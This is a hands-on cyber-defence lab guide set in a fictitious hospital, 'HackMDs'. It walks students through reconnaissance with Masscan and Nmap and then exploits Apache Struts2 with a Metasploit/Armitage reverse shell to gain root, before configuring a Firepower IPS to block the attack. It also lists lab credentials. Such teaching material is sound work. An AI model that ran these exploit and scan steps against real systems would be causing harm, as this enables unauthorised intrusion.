Required	Optional
Laptop with network capabilities	Cisco AnyConnect®
	Second device for reading lab notes

Scenarios

HackMDs.com: Connect and Set Up (Required)

Value Proposition: Welcome to HackMDs! As the new security administrator for our fictitious hospital entity, it will be important to familiarize yourself with the resources located within. This scenario walks through connecting to the model enterprise and ensuring that the security tools used today are up and available.

At the end of this scenario, you will have access to the lab environment and a map to the resources you will need for using the tools within this lab.

Connect to the Lab Jumphost

Prerequisite: We recommend using a web browser rather than AnyConnect for this lab.

If you must use the AnyConnect SSL connection option to access the dCloud labs, take the time to download the latest RDP (Remote Desktop) client for your Windows or Mac Operating System.

If you are using Windows, download the latest Microsoft Windows Remote Desktop Connection Manager RDP client software version. Use a search engine to find the latest version if needed.
If you are using Mac, download the latest Microsoft Remote Desktop for Mac RDP client software version. The software is readily available on the Apple App Store. Also, you can use a search engine to find the latest version.

In the CDC clinic environment, notice the clock at the top right of the screen. This will show the remaining time available for completing the lab. The Details tab displays information about your session, such as start, end and login credentials. The Resources tab provides links to support documentation.

Procedure

1	From the oob server, click URL at the bottom right, as shown below: Important: Log into the oob-server with the credentials shown next, in Step 2.
2	Log in with the username dcloud and password (your session ID).
3	Click the Servers tab to show all the systems running with the CDC environment. You can turn systems on or off if needed from this location.
4	Click the Details tab at the top left, and then write down your session ID number. You will need to use your session ID number as your password to access the lab. In this example, the number is Cisco12345.
5	You should now be in the Jump environment and see links to the cyber defense clinic lab resources. Click any resource to access it.
6	If you are in a server and want to leave the server, click the Back button (left arrow at top left of your screen) within your browser to go back to the Guacamole server.
7	Click the Back button on your web browser to leave an active session, you will notice the connection will appear under the Recent Connections area.

Validate Enterprise Systems

You validate enterprise systems to ensure that the systems that will be attacked are properly operating and available within this lab environment. We will be accessing the following resources:

Enterprise Resources Table


Host	IP Address	Web Address	Username	Password
Unsecure hackmds.com	198.19.20.5	www.hackmds.com	N/A	N/A
secured hackmnds.com	198.19.20.7	Secured.hackmds.com	N/A	N/A
WOW (Workstation on Wheels)	198.19.30.100		HACKMDS\nurse	C1sco12345
DR. Workstation	198.19.30.101		HACKMDS\dhowser	C1sco12345
Contractor Workstation	198.18.133.10		HACKMDS\dhowser	C1sco12345
Kali Linux Workstation	198.18.133.6			C1sco12345
IT Workstation	198.19.30.102		HACKMDS\IT	C1sco12345

Procedure

1	When logged in to Guacamole, verify that you can automatically log in to the Contractor, DR, IT, Kalie Linux, Workstation on Wheels and Jumphost environments.
2	If you are asked to log in to a system, enter the login name `HACKMDS\dhowser` and password `C1sco12345`.
3	When you have verified connectivity to all systems, select the Jumphost system to continue connectivity testing.
4	From the Jumphost desktop, open the Firefox web browser. Multiple tabs will open which will simplify accessing all necessary resources.
5	Go to the last open tab in Firefox to verify you can see the http://www.hackmds.com/ website. Note: At this point, you have successfully validated and connected to HackMDs.com enterprise management platforms.

Validate Security Systems

You validate security systems to ensure that the security tools available to HackMDs.com are running and available within the lab.

Resources Table


Host	IP Address	Web Address	Username	Password
Identity Services Engine	198.19.10.4	ise.ad.hackmds.com	admin	C1sco12345
Firepower Management Center	198.19.10.5	fmc.ad.hackmds.com	admin	C1sco12345
Stealthwatch Management Console (SMC)	198.19.10.6	smc.ad.hackmds.com	admin	C1sco12345
Email Security Appliance (ESA)	198.19.20.8	smtp.ad.hackmds.com	admin	C1sco12345
Rapid7 InsightVM	198.19.10.3:3780	scanner.ad.hackmds.com	admin	C1sco12345
Splunk	198.19.10.15	splunk.add.198.19.10.15	admin	C1sco12345
IBM QRadar	198.19.10.18	qradar.ad.hackmds.com	admin	C1sco12345
Radware APSolute Vision	198.19.10.22	vision.ad.hackmds.com	admin	C1sco12345
Radware Alteon / AppWall	198.19.10.24	alteon.ad.hackmds.com/appwall-webui/	admin	C1sco12345
Tetration	198.19.193.228		mslab@dcloud.cisco.com	C1sco12345!
Cisco Duo		Admin.duosecurity.com	Dynamically generated	Dynamically generated
Public AMP / SecureX		auth.amp.cisco.com	Dynamically generated	Dynamically generated
Splunk Platform	198.19.10.150			none

Procedure

Make sure you are logged into the Jumphost PC.

From the Jumphost PC desktop, go back to the Firefox browser or reopen the browser if needed.

You should have browser tab sessions automatically opened: Firepower Management Center (FMC) , Private AMP server, Stealthwatch Management Console (SMC), Identity Services Engine, Splunk, Splunk Phantom, IBM QRadar, Rapid7 InsightVM, Cisco ESA, Radware Absolute, Radware Appwall, Tetration and the HackMDS website.

Tip:

You can also access each of the security systems by opening browser sessions to the IP address listed in the Resources table.

Browse to the Cisco Firepower System (FMC) at: https://fmc.hackmds.com/ or switch to the first tab.

Note: If you receive a message with the phrase “Existing Session Detected” or “Session Expired,” click the Proceed button.

Validate that you are now connected to the Cisco Firepower Manager Console dashboard.

Next, repeat the process for the remaining tabs.


Tab	Username	Password
Cisco Stealthwatch Management Console (SMC)	admin	C1sco12345
Cisco Identity Services Engine (ISE)	admin	C1sco12345
Cisco Email Security Appliance (ESA)	admin	C1sco12345
Rapid7 InsightVM	admin	C1sco12345
QRadar	admin	C1sco12345
Splunk	admin	C1sco12345
Splunk Platform	admin	C1sco12345
Radware Alteon/AppWall	admin	C1sco12345
Tetriationon	mslab@dcloud.cisco.com	C1sco12345

Note:

Congratulations! you have successfully connected to HackMDs.com security management platforms.

Target Reconnaissance: Gather Information about Vulnerabilities for a Future Attack

Value Proposition: Reconnaissance is the first step to almost every cyber-attack you will encounter in the wild. Sometimes reconnaissance is a purposeful exercise where an attacker learns everything they can about a target. Other times, reconnaissance occurs at scale across the Internet to find the best potential targets. Passive reconnaissance happens when an attacker gathers information about a target without the target’s knowledge. Active reconnaissance happens when the attacker probes/investigates the target. Keep in mind that the easier it is for an attacker to learn about you, the more likely it is that the attacker can identify a method to breach your defenses. For this reason, it is highly recommended that you implement security that can obscure what resources you are utilizing. Cyber Defense helps you avoid overexposure of information to potential threats.

This scenario will set the stage for all other scenarios, because information obtained from reconnaissance can lead to various forms of attacks, depending on how the target is identified as vulnerable. Students will perform a simple port and vulnerability scan to represent one of the many methods real target research is performed. Real world research would take much more time and involve various methods to learn as much as the attacker could obtain about the potential target.

At the end of this scenario, you will have a basic understanding of how attackers research targets to prepare for future attacks. You will have an introduction to how to scan a target for open ports using Masscan as a port scanner, that has a very familiar NMAP-like syntax, as well as how to evaluate a target for vulnerabilities using a custom script that searches for a vulnerability using the attackers ‘specific’ toolchain. You will also play the defender role by scanning your network for unknown assets and evaluate those assets with a popular vulnerability scanner by Rapid7 called InsightVM (formerly called NeXpose).

This is your first lab as the attacker!

Lab Resources

Resource 1: Kali Linux Rolling Edition (includes Nmap and Masscan tools)
Resource 2: Ubuntu Server hosting Rapid 7 InsightVM

Web Reconnaissance using Shodan

Shodan is a search engine for hackers. You can identify specific devices on the internet as well as find details about such devices using data collected from service banners. Shodan works by crawling the internet for any publicly accessible device and continuously updating its database of everything on the Internet.

As devices are discovered by Shodan, users of Shodan can enter search queries for specific details such as a certain device type. As an attacker, you can use Shodan to identify vulnerable servers in your target environment. You can also cast a wide net to identify any devices with a specific vulnerability.

Many real-world attackers are not targeting a specific company, but rather searching the internet for opportunities. Consider the next lab, Smash and Grab as an example of this type of drive by attack where HackMDs happens to have one of its vulnerable servers discovered by an attacker using Shodan.

Access Shodan

Procedure

The first thing to do is browse to https://www.shodan.io/. You can search without logging in; however, you will have some limitations without having a free account. You can click Create a free account if you want to. There is a premium version that you can subscribe to, as well. The premium version gives you access to an API, Maps, App integrations, and more. For the purposes of this lab, you are not required to register for the free or paid account, but welcome to try them out if interested.

Bonus: Advanced Shodan search queries

If you would like to explore some advance search queries options in Shodan, then you will need to FIRST create a FREE user account.

See examples below of possible advanced searches queries you can run once you have created your FREE account.

Shodan Filters

https port:443 – This query will bring up a list of servers running port 443.
netcam – This query would bring up a list of netcam devices.
title: “Outlook Web Access" port:443,80 – This query will provide a list of sites hosting Microsoft OWA.
webcamxp country:SE – This search would bring up a list of webcams in Sweden.

Additional filters you can use to narrow down your search results:

City: Find devices in a specific city.
Country: Find devices in a specific country.
Geo: You can pass it coordinates.
Hostname: Find values that match the hostname.
Net: Search on an IP or /x CIDR.
OS: Search on operating system
Port: Find specific ports that are open.
Before/After: Find results within a timeframe.

Attacker Reconnaissance using Masscan

Masscan is known as an extremely fast internet port scanner. Masscan is not designed with a pretty GUI interface like some of the options available for port scanners like NMAP. We still see many administrators lead with NMAP to find hosts on their networks as they have for years. From the attacker side, we are finding many attackers now use Masscan as their tool of choice for the following reasons:

Uses NMAP syntax (familiarity)
Faster and more efficient than NMAP
Masscan can scan the entire internet in hours depending upon your internet connectivity.

Masscan has the following key features:

Portability (Windows, Mac OS X)
PF_RING ZC support from nTop to produce more than 2 million packets per seconds
Banner Grabbing Support
IP Spoofing
Configuration file loading
Syn-only scan
Does not ping the hosts first
Feature equivalent to running nmap in the following mode:
$nmap –Pn –sS –n –randomize-hosts –send-eth <hosts>

For additional Masscan documentation, please see GitHub – https://github.com/robertdavidgraham/masscan

Note: We have limited Masscan to never go beyond 10,000 packets per seconds. Masscan can overwhelm a network quickly!

In this lab, you will access the attacker server running Kali Linux through the GUAC Jump point. Masscan is installed directly on the Kali server and will be ran using the Kali Linux command line. A script that will find systems on the network is also located on the Desktop of the same host. The target you will be researching is the HackMDs DMZ servers found on the 198.20.5.0/24 network.

Note: The username for access to the Kali Linux attack server is root, and the password is C1sco12345.

Reconnaissance using Masscan

Procedure

1	Connect to the Kali Linux attack server.
2	Open a terminal: Click the Terminal Emulator icon at the bottom of the Kali Linux desktop.
3	Verify your target by running the following command: `dig www.hackmds.com` This will allow us to further validate that www.hackmds.com is hosted on the 198.19.20.0/24 network. In the real world, an attacker may or may not validate that the target owns the entire /24, but for the purposes of this lab, we are instructing you to only scan 198.19.20.0/24 network.
4	Run the following command against the target to find all the live hosts listening on 80,443,8080,8443 ports: `masscan –p80,443,8080,8443 198.19.20.0/24` You will see that there are multiple hosts live on that network. Two will be your targets! 198.19.20.5 – This seems to be a hackmds.com DMZ webserver that could be interesting. 198.19.20.8 – This seems to be an accidently exposed DMZ Anti-Spam filter server.

Discover a vulnerability using home grown tools

Now that you have scanned the HackMDs DMZ with a port scanner, an attacker may look for potential vulnerabilities with scripts that they created for specific exploits found in their personal tool kit. As the attacker in this scenario, you will be simulating this behavior. Here is the script that you will be using:

msfconsole -x "use exploit/multi/http/struts2_content_type_ognl; set RHOST $host; set RPORT 80; set TARGETURI /clientportal/fileupload/upload.action; check; exit" | grep vulnerable

Note: You do not need to run this code manually. Just use the script already created using the steps below.

This script is using Rapid7’s Metasploit module for the recent 2017 OGNL (Object-Graph Navigation Language) struts vulnerability. It looks at hardcoded paths specifically for the upload action vulnerability. The only variable in this script is the $host variable, which can be modified or hardcoded for www.hackmds.com. The script will check to see if a target is exploitable to this specific vulnerability and print out whether it is vulnerable or not.

Could an attacker do it by hand? Yes, but it is time consuming and tedious. Attackers will create scripts for well-known HTTP URI’s or alternatively spider your website and try every single link. Many exploit kits also use these tactics by targeting specific flash and java-based vulnerabilities, which will be leveraged to drop malware on systems that are unfortunate enough to be vulnerable.

Procedure

1	Open the terminal application by clicking on the “Terminal Emulator” icon at the bottom of the Kali Linux desktop.
2	Change your directory to the Desktop directory: `root@kali:~/# cd /root/Desktop`
3	Execute the attacker script by running the following command directing our attacker scanner to the 198.19.20.5 server, which is www.hackmds.com. `root@kali:~/Desktop# ./exploit-finder.sh`
4	Like many scripts found on hacker forums and other places on the internet, this script provides limited pieces of information. It has been hardcoded to use www.hackmds.com as a default location. The script itself doesn’t spider or look at all links. How does it work? It just uses Metasploit to check if a URL is vulnerable to this one vulnerability.
5	Upon closer inspection, we see that the following URL is vulnerable to our Apache Struts2 vulnerability: http://www.hackmds.com/clientportal/fileupload/upload.action. Here we see 198.19.20.5:80 is vulnerable, which if opened in a web browser is the hackMDs website!

Reconnaissance using NMAP

Next, we will show how many network administrators perform reconnaissance on their own environments today. NMAP is the most popular open source network mapping and auditing tool.

Example syntax of scanning a single host over IPv4:

# nmap –sT <IP address>

NMAP features include:

Host discovery – Identifying hosts on a network.
Port scanning – Enumerating the open ports on target hosts.
Version detection – Interrogating network services on remote devices to determine application name and version.
OS detection – Determining the operating system and hardware characteristics of network devices.
Scriptable interaction with the target – using NMAP Scripting Engine (NSE) and Lua programming language.

Several types of scan techniques are available in NMAP:

-sS TCP SYN|-sTConnect()|-sAACK|-sWWindow

-sO: IP protocol scan|-sN TCP Null|-sFFIN|-sX: Xmas scans

SYN scanning is used to determine the state of a TCP port without establishing a full connection.

References

For more information on NMAP port scanning techniques, go to: https://nmap.org/book/man-port-scanning-techniques.html.
SANS.Org NMAP cheat sheet: https://blogs.sans.org/pen-testing/files/2013/10/NmapCheatSheetv1.0.pdf
See the NMAP cheat sheet for less noisy methods of performing similar scans while avoiding detection.

Defender Reconnaissance Steps

In this lab, you will access the attacker server running Kali Linux to run all reconnaissance activity. NMAP is installed directly on the Kali server and will be run from the Kali Linux terminal command line.

The Rapid7 InsightVM vulnerability scanner is installed on the Ubuntu attacker server at 198.18.133.5 that will be accessed from a web browser session on the Kali Linux server. The target will be the same HackMDs DMZ server 198.19.20.5 that you previously found as the attacker.

To access Kali Linux attack server: Username is root and password is C1sco12345.
To access Rapid7 InsightVM : Username is root and password is C1sco12345.

Reconnaissance using NMAP

Procedure

1	While in the Kali Linux system, open the Nmap application by clicking on the screen with the arrow (Application Finder) at the bottom of the screen. This is the second to last icon. Note: To do this from a command line, open a terminal and type `Nmap`. Some people also prefer to use Zenmap, which is a GUI based version of Nmap.
2	Type `nmap` in the search window to see the available Nmap program options. Select the Nmap program from the search option list shown and click the Launch button to start Nmap application.
3	Run the following connect scan command against the web server hosted by HackMDs.com. `nmap –sT 198.19.20.5`
4	Next, run this UDP scan command against the target web server hosted by HackMDs.com. `nmap –sU -p 123,161,162 198.19.20.5` Note: For a better understanding of the STATE reported for each port, please reference the following link: https://nmap.org/book/man-port-scanning-basics.html Nmap connects with the target machine and port by issuing the connect system call. This is the same high-level system call that web browsers, P2P clients, and most other network-enabled applications use to establish a connection. The UDP scan works by sending a UDP packet to every targeted port. DNS, SNMP, and DHCP (registered ports 53, 161/162, and 67/68) are three of the most common ports.

Use Rapid 7 InsightVM for Discovery

Now that you have scanned the HackMDs DMZ with a port scanner, you will look for potential vulnerabilities using the InsightVM tool from Rapid7. InsightVM is installed on a separate Ubuntu attack server that you will access using a web browser session from the Kali Linux server. As with the port scanning exercise, our goal is to identify potential weaknesses.

Note: We selected these scans since they are quick to execute. See the optional advanced section of this scenario for more detailed scans. The advanced scan options will take longer to complete.

Procedure

1	From the Kali Linux desktop, look at the bottom of the screen and select the web browser icon to open the iceweasel web browser application.
2	In the browser, click the Rapid 7 InsightVM bookmark link to access the Rapid 7 InsightVM application. Note: If you cannot find the bookmark link, then you can manually type the URL IP address: https://scanner.hackmds.com:3780.
3	Log in with the username admin and password: `C1sco12345` Click X to close the pop-up notice about activation.
4	In the top bar on the home screen, select Create > Site. This brings up the site creation screen.
5	Use the following parameters for the General configuration section. Name--Target Importance--Normal Description--Target HackMDs.com website User-added Tags--None Note: If InsightVM already has a site named HackMDs, add a -1 or -2 at the end of the site name.
6	Next, click the Assets tab and under INCLUDE, in the text box that says enter name, address, or range, type the target, which is the www.hackmds.com server.
7	Click the TEMPLATES tab, and then select Full audit.
8	Click the SAVE & SCAN button at the top right of the application window. Depending upon your screen resolution, you might need to scroll to the right side to select the Save & Scan button. If prompted with “Are you sure you want to Save & Scan?” then click the “Save & Scan” button.
9	Now, wait for the InsightVM site scan to complete which could take up to 5-10 minutes. This is an opportune time to take a quick break.
10	While you wait, the Scan Progress will display. Note: If you just clicked Save, and not Save and Scan during the previous step, you would need to click the magnifying glass at the top to search for your site (HackMDs), select the site and select to run the scan.
11	When the scan has completed, scroll down to the “COMPLETED ASSETS” section of the report and click www.hackmds.com representing the target system that we want to examine. This will bring up the results of the scan that has just completed. The following example shows the number of potential vulnerabilities for the target system asset.
12	Scroll through the report to the “VULNERABILITIES” section and see the list of vulnerabilities that were identified by InsightVM including the Apache Struts vulnerabilities that exist on target DMZ server. Note: If you do not see the Apache Struts vulnerability, it’s likely that the Cisco Firepower IPS policy is already enabled and blocking InsightVM from having access to see the existing Apache Struts vulnerabilities on the DMZ target server. This is a good thing, because that means the Cisco Firepower prevented the attack already. However, we want to turn off this policy action for our vulnerability example to work. If you do not see this vulnerability after your scan is complete, then see your lab instructor for instructions on how to change the Firepower IPS policy. You will cover this in the next scenario. Real world systems will have vulnerabilities. It is close to impossible to keep a system functional and useful without exposing it to some form of risk. Therefore, practices such as patch management are critical to reducing the chances of being compromised.
13	To view additional detailed vulnerability information, select the first Apache Struts vulnerability link in the report. Note: In the report details for this vulnerability, you can see under the “Description” section that this vulnerability is “remotely exploitable”. This is key to an attacker exploiting access to the target. Our attacker needs a vulnerability that can be exploited remotely and unauthenticated.
14	To get an idea of the other potential threats within HackMDs, click the Assets tab on the left to bring up the summary of every asset and associated vulnerabilities. Take a few minutes to review the findings.
15	Close the Kali Linux web browser session to the Rapid7 InsightVM application. Note: There are many real-world vulnerabilities attacks that can be found by just searching the Internet. As an example, the JBoss vulnerability, that has been associated with the SamSam ransomware, can be found on systems by that searching Google for using the term /status&full=true.

Summary

This scenario showed how an attacker could perform research and reconnaissance on potential targets to identify vulnerabilities that can then be later exploited. Both attackers and defenders perform similar steps to accomplish these goals with slightly different tools and approaches. The scenarios that follow will show examples of attacks that will deliver exploits based on the results of your reconnaissance and vulnerability scanning.

Feel free to explore additional NMAP and InsightVM tools and options as shown in the Bonus Section – Nmap Advanced Options section.

Note: It is important to be aware that there really is not a 100% guaranteed way to defend against an attacker researching you. You can limit your exposure with technology, such as content filtering, firewalls, etc. However, there will always be some level of exposure that will always exist as you open your systems for external use.

Congratulations! You have now completed this scenario.

Bonus Section - Nmap Advanced Options

Procedure

1	Scan a network to find which hosts that are up and running. `nmap –sP 198.19.20.0/24`
2	Scan for specific ports using the -p option using the following two examples below. `nmap –p 80 198.19.20.5` `nmap –p U:53,137,T:21-25,80,443 198.19.20.5`
3	Scan for the open ports on a specific target IP address. `nmap -sS -p U:53,111,137,T:1-65535 --open 198.19.20.5` The above reconnaissance information collected of IP addresses, open TCP/UDP ports, along with additional information such as Social Engineering (for example, Facebook, LinkedIn, etc.), will help the attacker create various attack profiles for their targets. The next step would be to start looking for known vulnerabilities for the targeted list, which we will perform in the next scenario. Congratulations! You have completed this Bonus Section.

Smash and Grab: Attack Public Network Services Through the Front Door

Value Proposition: In this scenario, we will take the approach of attacking a web facing server, which we are calling smash and grab. The concept is that Mr. Orange, (aka YOU) the attacker, has already performed reconnaissance (scenario 2) using various network and vulnerability scanners.

First, Mr. Orange, ran the “Masscan” tool against the HackMDs DMZ and found a web server that is running on port 80. Next, Mr. Orange, ran a custom vulnerability scanner and discovered additional potential high-risk vulnerabilities. Mr. Orange did some research on the most critical vulnerability that was found, which is the version of Struts running on the Apache Tomcat DMZ web server.

Now, Mr. Orange, will use the Metasploit tool in this scenario to weaponized an exploit against the Struts vulnerability. This will allow Mr. Orange to obtain command line access or a “shell” on the vulnerable DMZ web server. The advance section of this scenario will show you how to further compromise DMZ web server as a gateway to pivot deeper into other the systems on the HackMDs network. You will also learn more about pivoting attacks in scenario 6.

It is important to point out that real world attacks involving exploitation can take a lot of effort to develop. Tools like Metasploit simplify the exploitation process by weaponizing complicated attacks so lower skilled attackers (also known as script kiddies) can point and launch extremely complicated attacks without understanding all that is involved with the exploit techniques.

Outcome

At the end of this scenario, you will have delivered a traditional server exploit using Metasploit. You will use Armitage, a GUI overlay to Metasploit, to launch your attack. You will search for the Struts vulnerability options, configure the attack, and then launch the attack. When the attack is complete, you will have a working command shell on the DMZ web server, giving Mr. Orange full access to the resources on the HackMDs DMZ network.

All Your DMZs R Belong to Us!

Once the attack is complete, you will switch to the defender role with the goal of detecting and preventing Mr. Orange from breaching the DMZ server. You will start off by accessing the Jumphost and using the up the Cisco Firepower Management Center. You will develop a basic IPS policy, which will include detection for the know Struts exploit. Once the new IPS policy is deployed, Mr. Orange will attempt the Struts exploit again and found it no longer works. Note that we have Firepower in IDS mode meaning Mr. Orange’s attacks will work until you change Firepower to IPS mode!

Note: An IPS is only as effective as the capabilities enabled. Many generic IPS offerings will have common attack protections available, however many enterprise IPS offerings MUST BE MANUALLY TUNED to your environment to have the right protection for YOUR potential vulnerabilities versus what the industry says to watch out for. Whereas, the Cisco Firepower Recommendations automatic tuning, uses host profiling techniques, including passive network observation and integration with patch management systems to determine where you are vulnerable and what defenses should be enabled. This takes a generic IPS policy and adjusts it closer to what you really want to protect … your assets!

This scenario also included a few bonus exercises. The first bonus exercise will walk you through how to leverage Firepower Recommendations for auto tuning the HackMDs IPS policy. The second bonus exercise will briefly cover the value of integrating a dedicated vulnerability scanner such as Rapid7 with Cisco Firepower to improve Firepower’s understanding of additional vulnerabilities that exist in the specific environment. Lastly, there is an advanced attacker exercise that will showcase what can happen if an attacker used already compromised system as a gateway to pivot deeper into the target’s networks.

Lab Resources

Attacker Resource 1: Kali Linux Rolling Edition 2017 (includes Metasploit with default installation)
Attacker Resource 2: Ubuntu Server hosting Rapid 7 InsightVM
Target Resource 1: HackMDs DMZ server running Ubuntu
Defender Resource 1: Cisco Firepower Management Center (FMC) Virtual Appliance
Defender Resource 2: Cisco Firepower Threat Defense (FTD) Next Generation Firewall (NGFW) Virtual Appliance

In this lab, Mr. Orange (you) will be abusing the Struts exploit discovered in scenario 2. First, you will fire up the exploitation tools using Armitage and Metasploit to launch your attack. You will setup the exploit with specific configuration options to attack the HackMDs DMZ server. You will execute the exploit and gain full root command shell access to the Hackmds.com web server.

Maybe This Server Should be Secured at Some Point?

Launch the Exploit

Procedure

Connect to the Kali Linux server.

Open a terminal window by clicking on the terminal emulator icon (second icon from the left) in the favorites bar on the bottom of the desktop. Optionally, you can also find the terminal application by clicking on the magnifying glass at the bottom and searching for the word “terminal”.

Before starting up Armitage, you need to initialize the Metasploit database by running the command msfdb init in the terminal. If it says it already has started, then you are ok as well.

In the terminal window, type the command armitage, and thn press enter.

When Armitage starts up, click Connect.

You will see a pop-up saying “A Metasploit RPC server is not running or accepting connections yet.” Click Yes to start the RPC server.

The Armitage window will show it is connecting to 127.0.0.1:55553. When the program has fully loaded, you will see the msf > prompt in the Console tab at the bottom part of the application window. This can take up to 30 seconds.

Verify that Armitage is using the correct database. Click Armigate > Preferences, and find this value: connect.db_connect.string. Under the value tab, select the data you want to copy. Type struts in the search text box above the console tab window. This will search the exploit database for anything related to struts. Resize the window if needed.

Double-click the exploit named “struts2_content_type_ognl”. The attack window should now be opened for this weaponized exploit. In this window, you can read a description of the exploit and set the configuration options prior to launching it. You can pull down the window to resize if needed.

For this exploit, double-click RHOST (remote host) value field to set the value of www.hackmds.com (our target aka the hackmds DMZ web server). We also want to set RPORT (remote port used to communicate with our target) to port 80 and TARGETURI set as “/clientportal/fileupload/upload.action”. We need to set the VHOST to “www.hackmds.com”. Finally, check the “Use a reverse connection” option.

Note:

You might need to resize or maximum the Attack window to see the Launch button at the bottom of the window.
The option called “use a reverse connection” enables you to select a payload that opens a reverse shell connection back to the attacker’s machine. This is what the SRVPORT/SRVHOST settings are configured for.

For this attack, Armitage is calling a preconfigured document, module4.rc that has some of the variables preset. Optionally, you can open a new terminal by clicking the terminal icon at the bottom of the screen. Then from the /root directory you can run the “ls” command to validate the file module4.rc exists. If you wish to view the contents of the module4.rc file, you can run the “cat module4.rc”. See an example of the contents of the module4.rc file below. This file fills in some of the remaining data needed to execute our attack such as where the local attacker server is located, what port to use and so on. It is not necessary for you to view this file before launching the attack.

Now that you have set all the correct parameters, click the Launch button to begin the exploit

This will bring you back to the console where you will see a new window called “exploit” open and see the actual attack log. When you see a red computer monitor icon in the top right window, this means you have successfully exploited the system. Congratulations Mr. Orange, you now have root access to the HackMDs DMZ web server!

Now you can interact with the host by spawning a shell session over the reverse session that was opened. To do this, right-click the red monitor and select Shell 1 > Interact. This will open a third window called “Shell 1” to interact with the exploited target system.

You can see from running some commands that you have gained full root access to the target server. For example, run the whoami, pwd and the netstat –rn commands. See example command output below. Feel free to run other various Linux commands like ls or others from the Linux cheat sheet provided below.

Linux Commands Cheat Sheet


Command	Description
pwd	Show your current working directory.
uptime	Show system uptime
cd ..	Move up one directory level in the path
ls	List the files in a directory. What’s in your folder?
whoami	Show your username. Wonder who you are logged in as?
man	Manual for any command. What is ls? Example: “man ls”
date	Shows the date
ls -a	Show all files including hidden files
grep	Narrows in on what you are looking for. Example “grep 192.168.1.1”
ps	Show a quick snapshot of processes
head “filename”	Show the first 10 lines of a file. Example head joey.pdf
tail “filename”	Show the last 10 lines of a file. Example tail joey.pdf

Note: This is game over for HackMDs, now that Mr. Orange is inside the DMZ network. The attacker could gain a persistent foothold and begin to pivot and compromise other various network devices too. We will showcase this concept in the advanced section at the end of this scenario. You will also see this phase of the attack in scenario 5.

Defend Web Resources with Intrusion Prevention

It is time to defend against this and other attacks using Cisco Firepower. In this exercise, we will identify the attack Mr. Orange just launched and adjust the intrusion defense policy (IDS) to become an intrusion prevention policy (IPS). We will also search the Firepower console to identify which systems are vulnerable and validate that Firepower recommendations identified our vulnerable DMZ server as something that the IPS should auto tune itself to. Let the fun begin!

Procedure

1	On the jumphost (not kali attack server), open a web browser and access the Firepower manager by using the Firepower tab or https://192.168.30.5/.
2	Log in with the username admin and password `C1sco12345`. Note: If you receive a message stating that “Existing Session Detected,” click the Proceed button to continue.
3	This will take you to the Summary Dashboard with a focus on threats. Imagine you are now an administrator logging in and finding that you have a major breach. For this exercise, we will look at the IPS rules: Click the Intrusion Events tab.
4	Here, you will see the top attackers, which in this case is Mr. Orange’s IP address seen as 198.18.133.6. Now click the 198.18.133.6 IP address to investigate the attack.
5	You will now see the details of the attack. As you can see, Firepower identified that your Apache server had the Struts vulnerability abused. If you look over to the right, you will see the priority and the attack classification. Anything of a high level like this should be investigated and dealt with.
6	To see even more details, click one of the classification notes such as the Attempted Administrator Privilege Gain. This shows the impact level of the threat, source, destination and other details. This again is a high priority/impact level 1 or 2 threat, meaning you must take care of this. Now it’s time to turn our IDS into an IPS. Note: Default Firepower IPS policies will automatically prevent this as well as other attacks. We had to manually disable Firepower defenses by adjusting the default IPS rules to prove the concept of the attack! You can see no action was taken since the “Inline Result” doesn’t show any action notations.
7	On the top tab area, click the Policies tab, select the Access Control drop down and then select Intrusion menu option to view the IPS policies.
8	You will notice a policy exists called Hack MDs Default IPS Policy. We will be modifying this policy. Click the pencil to edit it found by scrolling all the way to the left.
9	Modify the IPS Policy by selecting the Drop when Inline checkbox under Policy Information, then click the Rules menu. Note: Note: Some IDS/IPS solutions may offer an on-off button for enabling IPS mode. This translates to limiting the protection being offered to only what the vendor feels is important to protect you against. This approach does not consider what is on your network. This is typically referred to as IPS lite and not what you want when securing a network containing critical assets!
10	You will find thousands of rules available to use for your cyber defense. The challenge is figuring out which ones to enable that best fit your environment. In this example, we are going to manually identify all the options for struts attacks. Search for the word struts using the filter search box to find just the struts rules. Make sure you press the enter key to filter the rules. Note: Cisco Talos is continuously updating the available signatures based on the latest threats seen in the wild. Note: Notice that an enterprise grade IDS/IPS solution offers more signatures than you could enable. Enabling every signature would turn the security appliance into a brick meaning it would not be able to function. This is because there are just TOO MANY vulnerabilities that could exist on your network. Best practice is to tune your IPS to the rules that matter to your network security policy and environment. We will do this later in this lab.
11	The Filter returned around 56 results so now change all of these from Generate Events to Drop and Generate Events. First select the checkbox on the top left so all Struts rules are selected.
12	Click the Rule State and choose to Drop and Generate Events.
13	When Firepower confirms it has Successfully set the rule state for 56 rule(s), click OK to continue. Note: Cisco Talos is continuously updating the available signatures based on the latest threats seen in the wild.
14	Notice each Struts rule, now has an X, indicating the rules are now been configured to Drop and Generate Events.
15	Click Policy Information to go back to the main rule page.
16	You must now commit these latest changes by clicking the button. You will then be prompted to provide an optional Description of Changes and then click OK. Note: When trying to commit the changes, if the Firepower Management Center (FMC) generates an EOS Store Failed message, then logout and then log in back into FMC console. Now go back and commit the changes.
17	You will notice that we have saved and committed the changes, but we will still need to deploy the changes from the Firepower Management Center (FMC) to the Firepower Threat Defense (FTD) next generation firewall. To do this, click the Deploy button.
18	Now you need to select the Firepower solution to deploy this new configuration to. Select the checkbox next to the device named “ftd” and select the Deploy button to deploy this new IPS configuration.
19	You be asked to confirm the deployment. Click deploy. You will see the process start and the window will close once the configuration job is kicked off.
20	To check the status of the Firepower manager pushing the configuration to the Firepower appliance, click the explanation point within the red circle icon. The status will be shown as a percentage being completed. It should take several minutes for the deployment to complete.
21	After a few minutes, you should see the status change from red to green, along with explanation that the new policy is now deployed, and confutations are up to date.
22	Now we need to review the Firewall’s Access Policy. From the Policies tab at the top, select the Access Control dropdown, but this time select the Access Control item from the list.
23	You will see the network policy used by HackMDs called HackMDs Default Policy. Click the pencil icon all the way to the right to view and edit the HackMDs Default Policy.
24	Next, we will edit the first rule in the Access Policy called Default Rule by clicking the pencil icon as shown below. This will bring up the Edit Rule – Default Rule window for this access control policy rule. Notice all the tab menu options for controlling several types of policy access. The example below shows the menu options. Note: The following three pages provide reference information. To continue with the lab, you can skip to step 2 in the Smash and Grab: Attack Public Network Services through the Front Door (continued) topic.

Reference Information (optional to cover in lab)

This section is for your information and reference. To skip it, go to step 1 in Scenario 3 Smash and Grab: Attack Public Network Services through the Front Door (continued).

Zones: Groups of networks you defined such as your DMZ.

Networks: Network objects such as the entire inside network subnet.

Note:

VLAN Tags: VLANs
Customers with proxy solutions could benefit from Firepower due to Firepower being an Application Layer firewall and protecting ports that are not protected by Proxies.

Users: User groups that can be pulled from sources such as Active Directory. You can apply policies to specific users or groups such as only contractors.

